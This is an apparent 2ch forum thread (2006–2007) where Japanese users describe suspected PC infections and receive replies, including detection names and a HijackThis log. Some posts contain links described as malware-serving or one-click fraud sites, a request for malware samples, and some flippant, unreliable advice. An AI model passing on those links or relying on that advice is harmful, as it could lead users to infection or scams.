Backdoor.Win32.SdBot.bcf  感染被害の詳細
ttp://forum.higaitaisaku.com/viewtopic.php?t=1325&sid=c9ed311a03141dc24bdc2b67f9384dc5

12月30日現在で検出、駆除可能なアンチウイルス製品

製品名   検出名

Fortinet   W32/IRCBot.YW!tr.bdr
kaspersky  Backdoor.Win32.SdBot.bcf
Avira     TR.Agent.acp
Mcafee   ..W32/Sdbot.worm.gen.ca
AVG     .Anti-spyware Backdoor.sdbot.bcf

※その他のkasperskyエンジン搭載製品(F-Secureなど)でも可能。

64 :名無しさん@お腹いっぱい。:2006/12/31(日) 00:38:39
>>63
報告乙です
Big Yellowってやつですかね
symantec製品の脆弱性がねらわれているようですね 
該当ユーザーはパッチを確認したほうがよいかと

僕はリカバリ終了しました
来年もよろしくおねがいします


65 :名無しさん@お腹いっぱい。:2007/01/01(月) 01:44:37
【使用OS】 Windows XP
【MicrosoftUpdate】 しています
【使用セキュリティソフト】 Norton・Ad-Aware
【セキュリティソフトの定義ファイルは最新の状態であるか】 更新済
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】検出されない 
【どんな症状が出るか】 デスクトップに「ウィルスに感染した〜」「サイトを見た履歴が〜」等と出て
ソフトをダウンロードするようにしつこく迫ってくる
【症状が出る前に何をやったか】 Cabosでファイルを落とした
【症状を解決しようとどのような処置を取ったか】 セーフモードと通常起動で完全スキャン
Symantecでウィルスの情報を見てレジストリをチェック(異常なし)
【その他の質問】 ウィルスに感染している様子がないのに広告(SystemDoctor・DriverCleanerからの)
が表示されますこのようの場合どうすれば良いのでしょうか? 


66 :名無しさん@お腹いっぱい。:2007/01/01(月) 01:55:53
>>65
>>8の他メーカーでオンラインスキャンして
検出されたものをよく確認して、
http://pc10.2ch.net/test/read.cgi/sec/1167281093/9 の方法で提出
この場合は、(※「ディスクからファイルを削除する」にチェックを入れない)
その後で、削除対応しているメーカーならオンラインで削除してもらう。


67 :名無しさん@お腹いっぱい。:2007/01/01(月) 04:16:44
【使用OS】
 98SE
【MicrosoftUpdate】
 サポート終了まではやってました
【使用セキュリティソフト】
 バスター2001(本家で検索エンジンとパターンファイルDLできるので手動で入れ替えてる)
【セキュリティソフトの定義ファイルは最新の状態であるか】
 上記の通り一応入れ替えてます
【ルータの有無】
 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
 検出なし。無料のオンラインスキャンもやったが出て来なかった。Ad-Awareもクッキー以外何もでず
【どんな症状が出るか】
 @D:\○○¥×× ←の○○以下の階層のフォルダとファイルが全て文字化けリネームされた _| ̄|○。拡張子もなしに。
 A@になる3日前程から時々途中からネットにつながらない事が数十分あってモデムが悪いのかな?と思ってた
【症状が出る前に何をやったか】
 サイトから画像と動画落としたか、フリーソフト入れた(ウイルス反応はないが・・)ぐらいしか思い出せない。
【症状を解決しようとどのような処置を取ったか】
 原因が不明なのでとりあえず2ヶ月程前にCドライブのバックアップとってたのでWINDOWSフォルダだけ総とっかえした。
【その他の質問】
 全てリネーム(しかも文字化けで)するようなウイルスがあるのでしょうか?
  リネームされたのでもう前のファイル名に戻すのは不可能でしょうかねぇ・・やっぱ。

68 :名無しさん@お腹いっぱい。:2007/01/01(月) 04:45:20
どっちかというとHDDの方に問題がありそう。

69 :67:2007/01/01(月) 06:59:03
>>68
HDDですか・・。それは予想できませんでした。
Maxtarとは言えバルクの使ってますがHDDに問題あった場合ファイルリネームとか勝手になるのもですかねぇ?
とりあえず現状は無料のウイルススキャン渡り歩いて徹底してる最中です。
HDDに問題あるのならちょっと悲しいですね・・。ファイルもHDDも全て諦めるはめになってしまう。

70 :67:2007/01/01(月) 08:18:58
なんか症状が悪化しました・・。
D:\ にあるフォルダ認識してないというかウィンドウズロゴみたいなのになって下の階層にすら行けなくなった。
これはなんかHDDっぽいですね。バーティション分割してるもう片方のドライブは大丈夫なんですが・・。
時間かかるけどクラスタスキャンもやってみます。正月早々つらい・・。

71 : ◆N9P3SuvBPo :2007/01/01(月) 11:32:59
>65
>【症状が出る前に何をやったか】 Cabosでファイルを落とした

P2P(ファイル交換ソフト)系の質問はDownload板へどうぞ。

>70
こういう時は【アダ被】へGO!

72 :67:2007/01/01(月) 18:06:24
HDDの方の問題では?と>>68さんの指摘を受けハードウェア板に行ったら解決できました。
情けない事ですが原因はおそらくBIGDRIVE問題です。

137Gの壁があるのは知ってました(単に137G以上は認識できないのだろうという程度で)
そこで200GのHDDをパーティション分割してDドライブともう1つのドライブに分けて使っていたのです。
それがそもそもの間違いでした。一応BIGDRIVE問題でググったら以下のサイト見つけて納得。

HDD BigDrive問題の確認方法
http://miya0.dyndns.org/pc/other/BigDrive.html

結果ウイルスではありませんでしたがなんとか解決へ向かいそうです。
一部サルベージは成功しましたが、それでも結構失いました。
みなさんどうもお騒がせしました。そしてありがとう。

73 :名無しさん@お腹いっぱい。:2007/01/02(火) 05:47:13
【使用OS】 windows XP HOME SP2
【MicrosoftUpdate】 
やってあります
【使用セキュリティソフト】
ノートンアンチウィルス 2002
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新です
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ないです
【どんな症状が出るか】
気が付くと、プロセスの中に
E_FARNANJ.EXE
と言うのがあって、ググっても何も見つからないので怪しいと思いました。
【症状が出る前に何をやったか】
特に何かした覚えはないです
【症状を解決しようとどのような処置を取ったか】
特になにもしてないです
【その他の質問】
このプログラムが何であるのか、ご存知でしたら教えて下さいm(__)m



74 :73:2007/01/02(火) 05:55:56
ぐお、自己解決しました。
エプソンの
EPSON Status Monitor 3
というプログラムでした。
そう言えば、直前にプリンタドライバを入れてましたね・・・orz
お騒がせ致しましたm(__)m

75 :名無しさん@お腹いっぱい。:2007/01/02(火) 11:54:01
【症状が出る前に何をやったか】
特に何かした覚えはないです

76 :やちまた:2007/01/03(水) 19:29:33
Winnyからダウンロードしたwmvファイルをクリックしたら、
小さいウィンドウで、「金子被告が有罪判決でたのに・・・(以下略)」という文字とアニメの絵が表示され、
ダウンロード先のフォルダやwinnyのフォルダの中のtxtファイルやhtmlファイルがjpgファイルに変換され、
色々なプログラム(IEやOperaなど)の実行ファイルが削除され、
ノートンのセキュリティソフト(ウィルスファイル実行時は機能を停止させていた・・・・)も機能しなくなってしまいました。

どなたか、ウィルス名・駆除・修復方法を教えてください。
ウィルス名だけでも、参考アドレスだけでも結構です。
お願いいたします。


77 :名無しさん@お腹いっぱい。:2007/01/03(水) 19:33:32
原田ウイルスじゃね

78 :名無しさん@お腹いっぱい。:2007/01/03(水) 21:01:02
ふたばの専ブラのあれをウイルス勘違いして
今日一日つぶしたおrz


79 :やちまた:2007/01/03(水) 21:02:21
>77さん
そうみたいですね。

80 :名無しさん@お腹いっぱい。:2007/01/03(水) 21:20:22
携帯から失礼します。
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています。
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】はい。
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
今は何も見つかりません。
【どんな症状が出るか】
接続状態で、様々な送信先に様々な件名でメールが送り続けられてしまいます。(そのたびノートンの電子メールスキャンが一通一通のスキャンを始めます。)
【症状が出る前に何をやったか】
期限が切れてしまったので、数カ月間定義ファイルの更新を怠っていました。
【症状を解決しようとどのような処置を取ったか】
即刻定義ファイルの更新を行い、チェックを行ったところ、ウイルスやスパイウェアが12種ほどあぶり出されてきました。それらは全て指示に従って処理したはずが、上記の症状だけが残ってしまったのです。

上記と同様の症状、解決方などご存知の方いらっしゃいましたら、ご教授いただけますでしょうか。

81 :名無しさん@お腹いっぱい。:2007/01/04(木) 05:32:07
【使用OS】
WindowsXPHome
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
NortonAntiVirus2006
【セキュリティソフトの定義ファイルは最新の状態であるか】
はい
【ルータの有無】
あります
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
検出されなかった
【どんな症状が出るか】
今のところ出ていない
【症状が出る前に何をやったか】
定義ファイルの更新
【症状を解決しようとどのような処置を取ったか】
ノートンのオンラインウイルス検出
【その他の質問】
//headline-news.tripod.com/national/20061109-00000132-mai-soc.html
このサイトをを他のサイトのリンクから開いてしまったのですが(開くとウイルスに感染します!)
ページが出るのが遅くてすぐに閉じてしまいました。
その後このサイトがウイルスに感染するのを知って怖くなり
ノートンのオンラインウイルス検出をしてみたのですが
検出されませんでした。
これはウイルスに感染してないということでしょうか。

82 :名無しさん@お腹いっぱい。:2007/01/04(木) 11:44:27
>>81
すでにページが404だったんだが、不安なら、他のオンラインスキャンを試してみるべし。
ttp://www.securityzone-za.bne.jp/virusscan.htm

83 :81:2007/01/04(木) 17:57:48
>>82
返答ありがとうございます。
早速他のオンラインスキャンをいろいろ使ってみましたが
やはり検出されず。
Ad-AwareやSpybotでも何も検出されませんでした。
ページが404だったのは知りませんでした。
もしかしてページが出る速度が遅いのもすでに404だったからかも?
どちらにしろ報告ありがとうございました。

84 :名無しさん@お腹いっぱい。:2007/01/04(木) 21:46:07
>>39
98SEなどで感染しないようにするには良い方法ないですか?
参ったなぁ・・

85 :名無しさん@お腹いっぱい。:2007/01/04(木) 22:02:07
>>84
普通にFWとアンチウィルスソフト入れたら?
Freeでも使えるのあるでしょう

86 :名無しさん@お腹いっぱい。:2007/01/05(金) 00:04:43
考えてみたのですが、「ウィルス」は、コンピュータを様々な弱点をつく、
近年では巧妙な手口でインストールさせるとか、ウィルスをパソコンに混入
させるとか、様々な手法の手口が見受けられますが・・・例えば、最近に
製造されたウィルスが、ある一つのWebサイトや、共有
ソフトで共有されるファイル等を介して、他人のPCに侵入
したとします。そこで、アンチウィルスの大手企業会社はそれを
すぐさま発見し、現在インストールされてるソフトのバージョンアップ
を、警告として要求してきますよね。ウィルスが無かったら、アンチウィル
スのソフトは、売れないし、会社は儲かりませんよね。アンチウィルスソ
フトが成功するには、ウィルスが必要ということになりますね。
これじゃあ、同じことの繰り返しですね。どちらかがどちらかを勝らないと
、永遠に同じ状況の繰り返しですね。ある企業が、どの世の、どのウィルス
どの悪意のあるソフト、どのコンピューター上におけるウィルスを根こそぎ
破壊、消滅、抹殺を実行するソフトが現れるなんて、現代の技術では無理
難題かもしれません。どちらかがどちらかを勝らないと、両者とも永遠に
進化し続けて、無限に続いていく世界なのかもしれません。ウィルスを
製造するものは、他人のコンピューターに問題を起こしたり、システムに
重大なエラーを起こしたり、起動しなくしたり、そのものの機能として
成り立たなくしたりするウィルスは、近年大量に出回っていることでしょう
多分、製造する物はそれが仕事か個人で制作して楽しいからやっているのか
・・・。第一、ウィルスも、アンチウィルスソフトも、共に必要性は無いです
どうして「ウィルス」等という意味の無い物質がこの世にあるのでしょうか
このようなバランス関係は、歴史的背景から見ると、似たような物が多々
あると思います。この状況が改善される日は、遠いと思います。

87 :名無しさん@お腹いっぱい。:2007/01/05(金) 09:18:16
妹の死体をノコギリで

まで読んだ

88 :名無しさん@お腹いっぱい。:2007/01/05(金) 09:53:03
>>86
おまいは考えなくていいから

89 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:14:10
あげ

90 :名無しさん@お腹いっぱい。:2007/01/05(金) 13:30:17
>>80
スパイウエア対策ソフト入れて削除する

91 :名無しさん@お腹いっぱい。:2007/01/05(金) 15:57:05
ヤフーのログイン状態のままでずっといると
何か危険ですか?

92 :名無しさん@お腹いっぱい。:2007/01/05(金) 16:58:57
質問失礼します…。
四時間ぐらい前にハンゲームでゲームをしていたところ本体の方から変な音がしだして…画面が青くなり、なにやら文字がでてきました。(文字は英語です。

そのあと五分後くらいしたら再起動がかかってしまいました。それからWindowsが開けなくなりました…。
どうすればよろしいのでしょうか…

93 :名無しさん@お腹いっぱい。:2007/01/05(金) 17:53:22
PC買い換えしかないだろ…
常識的に考えて…

94 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:12:57
そうですか…。本体だけ買い替えで大丈夫ですよね…?液晶等は買い替えの必要ないですよね?

95 :名無しさん@お腹いっぱい。:2007/01/05(金) 18:36:56
メーカーPCの中にはモニタと本体が独自の端子で繋がってるものもあるから
そういう場合は丸ごと買い替え

ttp://ja.wikipedia.org/wiki/%E7%94%BB%E5%83%8F:DE15_Connector_Pinout.svg
接続端子がこんなやつだったら多分使い回しは可能

何かスレ違いの話題だな
PC初心者板にでも行ってくれ

96 :名無しさん@お腹いっぱい。:2007/01/05(金) 19:36:56
【使用OS】
WindowsXP
【MicrosoftUpdate】
しています
【使用セキュリティソフト】
Kingsoft Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】
自動で最新に更新されます
【ルータの有無】

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Win32.Adware.Cydoor.a.331776
【どんな症状が出るか】
重大な症状は今のところ無いみたいです。
【症状が出る前に何をやったか】
今のところ症状は出ていません。
【症状を解決しようとどのような処置を取ったか】
Kingsoftでウィルスを隔離しています。
削除することも可能ですが、今は隔離しています。
【その他の質問】
もう1つウィルスが入ってきているみたいです。
Win32.Adware.Cydoor.a.42496
です。

2つとも久しぶりに完全スキャンを行ったら出てきました。
今のところ重大な症状は出てきていないのですが…。
削除してもよろしいのでしょうか?

元の場所は2つともC:\WINDOWS\system32にありました。

97 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:26:25
antinnyの検体置いてあるとこ教えて。


98 :名無しさん@お腹いっぱい。:2007/01/05(金) 20:30:24
>>96
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-adware.cydoor.html

99 :遭難者:2007/01/06(土) 09:01:56
誰か助けてください。
先日人に貸したSDカードからウィルスが入りました。去年のノートンは入っていた
のですが別に大した事も無いだろうと思い更新していませんでした。それで早速
ソースネクストのソフトを買いましたが駆除できずフリーウェアも探しましたが
どれも効きません。
そこでハードをフォーマットしてリカバリーをかけましたがまだ残っている様子、
はっきり言ってどうしたらいいのか解りません。
新しいソフトを買っても良いのですが効かないソフトに金をつぎ込みたくないし、
これって例えばハードを新しいのに乗せ換えてリカバリーしたら元の状態に
戻るのでしょうか?
誰か教えてください。

100 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:06:14
>>99
自作自演の邪魔しちゃったかな

うふふふ

101 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:14:17
アダルトサイトで18歳以上を押したら
勝手にファイルを保存 てなりました
どこのファイルに保存されたのでしょうか

http://adult2.net/index1.php?id=10

102 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:15:19
ttp://adult2.net/index1.php?id=10

103 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:19:18
>>101
これワンクリサイトだよ
IP取得のアニメだったんじゃないか?

104 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:24:05
どこか削除しなくていいですか
パソコンに何か残ってませんか

105 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:29:46
越中ふんどし

106 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:40:12
どこか削除しなくていいですか
パソコンに何か残ってませんか

107 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:42:18
>>104
実際踏んでみたがやっぱりIP取得のアニメだった
気にしないでいい

108 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:43:38
日本語が出来るようになってからまた来てくれ。

109 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:45:38
ありがとうございました

110 :名無しさん@お腹いっぱい。:2007/01/06(土) 09:49:33
何故に二回ずつ書きこむのだろうか

111 :名無しさん@お腹いっぱい。:2007/01/06(土) 12:58:39
【使用OS】
XP home
【MicrosoftUpdate】
してる
【使用セキュリティソフト】
ノートンインターネットセキュリティ
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
あり
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Trojan-PSW.Win32.QQPass.se
【どんな症状が出るか】
病状特に無し

先程ノートンインターネットセキュリティでスキャン実行し、
何事も無く終了したのですが、
念のためにカスペルキーオンラインスキャンを実行したところ、
「Trojan-PSW.Win32.QQPass.se」というものが感染ファイルとして出てきました。
感染ファイルは、
Norton Internet Security\Norton AntiVirus\Quarantine に入ってるようです。
これは感染なのでしょうか?


112 :名無しさん@お腹いっぱい。:2007/01/06(土) 13:43:49
>>111
Quarantine = 隔離
ノートンが駆除したファイル。問題無い

113 :名無しさん@お腹いっぱい。:2007/01/06(土) 14:11:24
>>112
ありがとうございます。
ホッとしますた。

114 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:14:20
エロサイト開いて遊んでいたら、ワンクリツク詐欺にあいまして

115 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:38:44
それから、それから

116 :名無しさん@お腹いっぱい。:2007/01/06(土) 19:48:29
【使用OS】 windows2000sp4
【MicrosoftUpdate】 してる
【使用セキュリティソフト】 systemdoctor
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
206のエラーがサイトのスキャンで検出
【どんな症状が出るか】 広告とか
【症状が出る前に何をやったか】 バナーをカチリ
【症状を解決しようとどのような処置を取ったか】 メッセージにはい
【その他の質問】最強!

117 : ◆N9P3SuvBPo :2007/01/08(月) 02:48:46
平和だ〜ヽ(´ー`)ノ

118 :名無しさん@お腹いっぱい。:2007/01/08(月) 07:19:06
>>116
つSpybotなど

119 :名無しさん@お腹いっぱい。:2007/01/10(水) 12:48:32
【使用OS】 WindowsXP SP2
【MicrosoftUpdate】 はい
【使用セキュリティソフト】Symantec AntiVirus
【セキュリティソフトの定義ファイルは最新の状態であるか】はい
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
Bloodhound.NsAnti
【どんな症状が出るか】
共有フォルダのファイルが消える
exe.exeファイルが勝手に作成される
【症状が出る前に何をやったか】
誰かがウイルスを持ってきて、それが共有フォルダから広まった?
【症状を解決しようとどのような処置を取ったか】
ウイルス定義ファイルの更新とスキャン
【その他の質問】 対処法を教えてください

120 :119:2007/01/10(水) 12:50:45
上に付け足しですが、Windows2000は感染しませんでした。
対処法分かる方がいましたら教えてください。

121 :名無しさん@お腹いっぱい。:2007/01/10(水) 13:16:43
>>120
Bloodhound.NsAnti
未知の脅威の可能性があるものが発見された場合、ウイルス名 Bloodhound.NsAnti を使用します。
Bloodhound.NsAnti として検出されるファイルは、ワームやトロイの木馬の新しい亜種である可能性が
あります。このようなファイルは、分析のために Symantec Security Response へ提出してください。
スキャンと配信機能を使用してファイルを提出する方法については、"スキャンと配信ウィザードを使用して
Symantec Security Response に疑わしいファイルを提出する方法" をご覧ください。

ttp://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-bloodhound.nsanti.html

検体提出するのが一番良い希ガス。
その検体漏れも欲しいな。

122 :名無しさん@お腹いっぱい。:2007/01/10(水) 21:50:55
Tempに小僧フォルダという見慣れないフォルダを見つけました中は木幡OOという空フォルダ・・・
ノートン無反応。何でしょうか?

123 :名無しさん@お腹いっぱい。:2007/01/11(木) 14:47:22
【使用OS】 windowsXP
【MicrosoftUpdate】 すみませんわかりません(汗
【使用セキュリティソフト】 ウイルスバスター2006
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
感染したのは昨日です
ウイルスバスターでは何も検出されませんでした
【どんな症状が出るか】
以下に記述します
【症状が出る前に何をやったか】
2ちゃんの壺を使って2ちゃんを見てました
画像ファイルをクリックしたらなかなか表示されずに変になったので、そのページを閉じました
それ以降インターネットで新しいページを開こうとすると重くなって、黒い画面がでたりしました
でもマウスを動かすと一応表示はされました
【症状を解決しようとどのような処置を取ったか】
ウイルスバスターでは検出されなかったので、とりあえず壺を削除しました
そしたら症状がなくなったので、今はまた壺をDLしてます
今は症状は出ないのですが心配で・・
症状がなくなっただけでまだウイルスに感染中なのかも・・
【その他の質問】
このウイルスのせいなのかはわからないのですが、
今日気づいたのですが何故かインストールした覚えのないプログラムがあります・・
名前を挙げると、Ghostscript、Imagemagick、SWIprolog、winShell、PanasonicWirelessDisplayの5つです
調べたところ悪いプログラムではないようですが・・
このノートPCはwindowsとLinuxの二つOSが入ってるので、
Linux側にあったプログラムが勝手に移行されたという可能性もあるかもしれません・・
Linuxにこんなプログラムが入ってたかどうかまでは覚えていませんが・・

なんかグダグダですみません・・
何でも構わないので何か教えてくださいお願いします!

124 :名無しさん@お腹いっぱい。:2007/01/11(木) 16:22:15
【使用OS】
windows XP
【MicrosoftUpdate】
【使用セキュリティソフト】
avast! 4.7
【セキュリティソフトの定義ファイルは最新の状態であるか】
最新
【ルータの有無】
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
ファイル名:C:\WINDOWS\System32
ウィルス名:Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj]
【どんな症状が出るか】
update[数字].exeが増える パソコンが重くなる
【症状が出る前に何をやったか】
mixiの登録画面を開いた
【症状を解決しようとどのような処置を取ったか】
avast! 4.7、Spybotを使って、出たもの全てを駆除。

しかし、avast! 4.7は反応しなくなったものの、パソコンを起動させてから
3、4時間は重すぎてパソコンが使えない、仮想メモリが不足してると出る。
3、4時間をすぎると、何事もなかったかのようにパソコンは軽くなり、
普通にネットができる。
【その他の質問】
最初は、外国の広告がよく出てきた。
勝手にウィルス駆除ソフト(?)等がインストールされてたので、
アンインストールをしたら出なくなる。
しかしその後、【症状を解決しようとどのような処置を取ったか】に書いた症状が出る。

よろしくお願い致します。

125 :名無しさん@お腹いっぱい。:2007/01/11(木) 16:27:31
【使用OS】 XP SP2
【MicrosoftUpdate】 してます
【使用セキュリティソフト】 Norton Internet Security
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 W32.Mytob.QU@mm
【どんな症状が出るか】 ACCOUNT ALERTなる英文メールが来る
【症状が出る前に何をやったか】 なんか良く覚えていない
【症状を解決しようとどのような処置を取ったか】 フルスキャン
【その他の質問】
シマンテックのHP上で出ている処置方法をやってみたが、レジストリに書き込まれている
はずのexplore exeなるものが発見できない。
とりあえずOutlookのメッセージルールで削除する様にはしてあるが、根本解決したいので
よろしくお願いします。

126 :名無しさん@お腹いっぱい。:2007/01/11(木) 17:04:34
レジクリーナーとかはウイルス対策に有効かな?

127 : ◆N9P3SuvBPo :2007/01/11(木) 17:59:15
>123
OSはWindowsXPとありますよね?
SP2がインストールされているかを確認します。
マイコンピュータのプロパティ画面を開いて
「Windows XP
Service Pack 2」
があれば
【MicrosoftUpdate】は自動更新になってるはずなので最新だと思われます。

とりあえずなんですが…
カスペルスキーのオンラインスキャンを試してみることをお奨めします。
ttp://kaspersky.co.jp/

>124
C:\WINDOWS\System32 フォルダ内に
Win32:CWS-Y [Trj] Win32:Agent-AIV [Trj] Win32:Agent-EAD [Trj] Win32:Small-DJJ [Trj] が見付かったと。

HijackThisのログが必要ですね。

>125
今のご時世ルータは必須ですよw

で、ノートン先生が「W32.Mytob.QU@mm」を
ACCOUNT ALERTなる英文メールに
記載されていた添付ファイルに反応したということでしょうか?

128 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:10:17
>>127
>で、ノートン先生が「W32.Mytob.QU@mm」を
>ACCOUNT ALERTなる英文メールに
>記載されていた添付ファイルに反応したということでしょうか?

いや、うさんくさいメールだったので、Googleで調べてみたらコレだった、と。
シマンテックのHPに載ってるメール本文が全く同一だったので。

で、処置方法によれば、レジストリ内にexplore exeが作られてるから
ソレを削除せよ、と。
しかし、ソレが無い!

129 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:28:46
>>127
ありがとうございます。HijackThisのログです。

Logfile of HijackThis v1.99.1
Scan saved at 18:17:06, on 2007/01/11
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Program Files\Network Associates\VirusScan\Avsynmgr.exe
C:\WINDOWS\System32\S3hotkey.exe
C:\WINDOWS\System32\S3tray2.exe

130 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:29:17
C:\WINDOWS\System32\pctspk.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe
C:\Program Files\MessengerPlus! 3\MsgPlus.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\QuickTime\qttask.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\System32\adirss.exe
C:\WINDOWS\System32\Tablet.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Yahoo!J\Messenger\ypagerj.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\System32\conime.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Java\jre1.5.0_08\bin\jucheck.exe
C:\WINDOWS\System32\wbem\wmiapsrv.exe
C:\Program Files\Fenrir & Co\Sleipnir\bin\Sleipnir.exe
C:\Documents and Settings\ユーザー名\デスクトップ\HijackThis\HijackThis.exe

131 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:30:06
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\yt.dll
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: IdnHelperObj Class - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {67982BB7-0F95-44C5-92DC-E3AF3DC19D6D} - C:\Program Files\Video ActiveX Object\isaddon.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\yt.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [S3hotkey] S3hotkey.exe
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKLM\..\Run: [PCTVOICE] pctspk.exe

132 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:31:01
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [{262CF15F-287A-4D26-8EAF-3B28BF7F018F}_UserSetup] C:\PROGRA~1\SHARP\PAGEDE~1\UserInit.exe
O4 - HKLM\..\Run: [DialApp] C:\Program Files\SHARP\mt\3.0\bin\DialMng.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_08\bin\jusched.exe"
O4 - HKLM\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe"
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [sysinter] C:\WINDOWS\System32\adirss.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [MessengerPlus3] "C:\Program Files\MessengerPlus! 3\MsgPlus.exe" /WinStart
O4 - HKCU\..\Run: [Yahoo!Japan Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\MSN Messenger\msnmsgr.exe" /background

133 :名無しさん@お腹いっぱい。:2007/01/11(木) 18:32:18
O8 - Extra context menu item: CyberSyndrome 一発プロキシ設定(&X) - C:\WINDOWS\WEB\iprxs.htm
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203
